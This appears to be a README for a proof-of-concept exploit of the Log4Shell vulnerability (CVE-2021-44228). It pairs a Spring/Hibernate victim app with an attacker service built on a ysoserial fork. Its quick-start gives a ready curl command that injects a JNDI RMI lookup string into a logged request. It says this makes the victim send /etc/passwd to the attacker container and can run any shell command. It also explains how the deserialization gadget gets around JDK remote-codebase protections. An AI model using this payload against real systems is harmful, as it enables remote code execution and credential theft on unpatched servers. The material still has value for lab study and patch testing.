## https://sploitus.com/exploit?id=52BA1465-B7E9-59C1-A20F-E38A5EAE272D
# CVE-2021-44228 POC - Spring / Hibernate
_This POC uses Spring / Hibernate for the gadget chain; however, the same approach (a JNDI `rmi://` lookup whose result is deserialized by the victim) can be used to trigger any deserialization gadget present on the target's classpath._
# TL;DR
```shell
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'
```
You should see the contents of the victim's /etc/passwd appear in the logs of the `attacker` container.
You can replace the command in the `exploit` service to run any shell command on the victim.
## Victim
The victim is running a standard [starter spring app](https://start.spring.io/#!type=gradle-project&language=java&platformVersion=2.6.1&packaging=jar&jvmVersion=11&groupId=dev.uint0.pocs&artifactId=cve202144228&name=cve202144228&description=CVE-2021-44228%20POC%20-%20Spring%20%2F%20Hibernate&packageName=dev.uint0.pocs.cve202144228&dependencies=data-jpa,web,h2) with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only 2 modifications have been made on top of this:
1. Removed tests
2. Replaced the default `slf4j` logger with a `log4j` 2 version affected by CVE-2021-44228
All dependencies are up to date. No special JVM flags are set: in particular, the JDK default `com.sun.jndi.rmi.object.trustURLCodebase=false` is left in place, which is why this POC relies on the victim deserializing the object returned by the RMI lookup (with the gadget classes supplied by Hibernate on the victim's own classpath) rather than on loading a remote class from an attacker-controlled codebase.
The victim exposes a `POST`-able endpoint on `/` which will log the request.
## Exploit
The exploit relies on a fork of [ysoserial](https://github.com/uint0/ysoserial) using the `Hibernate` payload generator. For the payload to work against the latest version of Hibernate, ysoserial has to be recompiled.